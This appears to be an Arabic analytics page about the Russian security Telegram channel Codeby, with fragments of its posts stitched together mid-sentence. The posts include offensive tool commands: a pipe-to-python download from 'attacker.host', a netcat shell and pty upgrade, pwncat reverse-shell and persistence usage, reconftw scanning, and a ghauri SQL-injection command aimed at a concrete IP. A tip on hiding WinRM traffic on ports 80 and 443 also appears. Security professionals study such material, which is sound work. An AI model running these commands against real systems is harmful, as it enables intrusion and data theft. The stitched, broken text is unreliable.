Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام Codeby
تُعد قناة Codeby (@codeby_sec) في القطاع اللغوي الروسية لاعباً نشطاً. يضم المجتمع حالياً 36 597 مشتركاً، محتلاً المرتبة 3 752 في فئة التكنولوجيات والتطبيقات والمرتبة 17 776 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 36 597 مشتركاً.
بحسب آخر البيانات بتاريخ 11 يونيو, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 207، وفي آخر 24 ساعة بمقدار 9، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 7.55%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 4.10% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 2 763 مشاهدة. وخلال اليوم الأول يجمع عادةً 1 502 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 20.
- الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل edr, api, вектор, mitre, att&ck.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 12 يونيو, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
Стоит отметить, что данный продукт получил соответствие требованиям ФСТЭК по 4 уровню доверия (УД4) достаточно быстро. Ранее компания уменьшила срок прохождения испытаний ФСТЭК с 6 месяцев до 3.На фоне глобальных новостей по поводу импортзамещений данный релиз выглядит очень хорошим, и его использование совместно с другими платформами виртуализации поможет закрыть большинство технических мер защиты виртуальных сред. #новости
POST /wsman 443 – 45.12.67.18 HTTP/1.1 Ruby+WinRM+Client+(2.8.3,+ruby+2.7.2+(2020-10-01))Как видно из запроса, использовался некоторый клиент для WinRM, написанный на Ruby. Но интересно тут указание порта 443, ведь WinRM работает на 5985, 5986 портах. 💻WinRM — это название как службы, так и протокола Windows, использующегося для удаленного управления, администрирования и мониторинга систем. Обычно используется злоумышленниками для перемещения в инфраструктуре жертвы. ⬇️Оказывается с помощью представленных ниже команд можно сконфигурировать WinRM так, чтобы в дополнении к стандартным портам добавлялись порты 80, 443. ⏺️winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} ⏺️winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} ✏️ Используя эту особенность, злоумышленники могут ввести в заблуждение исследователей безопасности, мимикрируя под обычный трафик в инфраструктуре.
🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.Методы кражи данных, которые используют мошенники: 🔸Фишинг: Создание фейковых сайтов и поддельных писем, чтобы обманом получить у сотрудников доступ к данным. 🔸Брутфорс-атаки: Автоматический подбор паролей для доступа к аккаунтам и хранилищам. 🔸Программы-шпионы: Вирусы, которые внедряются в операционные системы и незаметно отправляют данные злоумышленникам. ✉️ Какие данные могут быть украдены? Чаще всего атакуют персональные данные клиентов, финансовые сведения, бизнес-информацию, а также предметы интеллектуальной собственности, такие как патенты и разработки. 5 признаков уязвимости информации в компании: 🔸Высокая текучка сотрудников. 🔸Постоянные командировки с использованием рабочей техники. 🔸Активное взаимодействие с контрагентами, требующее обмена данными. 🔸Сложная IT-инфраструктура с распределёнными правами доступа. 🔸Обслуживание техники в сторонних сервисах. В условиях, когда утечки данных могут затронуть любую компанию, важно принимать активные меры по защите информации, обучать сотрудников и контролировать все возможные каналы утечки. ➡️ Читать подробнее в блоге
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
⚙️ Режимы:
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
🔥 Некоторые возможности:
# Osint Domain information Emails addresses and passwords leaks Metadata finder API leaks search # Subdomains Certificate transparency NOERROR subdomain discovery Bruteforce Permutations JS files & Source Code Scraping DNS Records # Hosts IP info CDN checker WAF checker Port Scanner Port services vulnerability checks Password spraying Geolocalization info # Webs Web Prober Web screenshoting Web templates scanner CMS Scanner Url extraction Favicon Real IP Fuzzing Wordlist generation Passwords dictionary creation # Vulnerability checks XSS Open redirect SSRF CRLF Cors LFI Checks SQLi Check SSTI SSL tests 4XX Bypasser💻 Home 💻 Mindmap
tar -xvzf webtty_0.5.1_Linux_x86_64.tar.gz
🔸Запустим утилиту
./webtty
⚙️ После запуска происходит генерация данных для подключения, которые необходимо скопировать в браузер по приведенной выше ссылке. Далее полученный ответ в браузере копируем на сервер и получаем соединение!python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
💻 Homenc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Надоело ? Мне тоже
Установка:
python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
Основные опции:
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется. Переключение между режимами(local <> remote) Ctrl + D Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download. Модули escalate и enumerate для ленивых❗️ Вывод suid'ных бинарников
run enumerate types=file.suid❗️ Задействует все режимы
run enumerate💻 Download ❕ Docs
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.Ключевые уязвимости, на которые нацелен Androxgh0st: 🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам 🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код 🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды. #новости
pip3 install git+https://github.com/GreyDGL/PentestGPT
🔸 Импорт ключа
Для корректной работы нам понадобится ключ для доступа к API OpenAI
shell export OPENAI_API_KEY='<your key here>'
🔸 Проверка работоспособности
pentestgpt-connection
🔸 Запуск утилиты
pentestgpt --reasoning_model=gpt-4-turbo
После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверкиBoolean based Error Based Time Based Stacked QueriesПоддерживаемые СУБД:
MySQL Microsoft SQL Server Postgres OracleПоддерживаемые типы:
GET/POST Headers Cookies Mulitipart Form data JSON SOAP/XMLДобавлена поддержка:
--sql-shell
--proxy
⚙️ Установка и запуск:
git clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
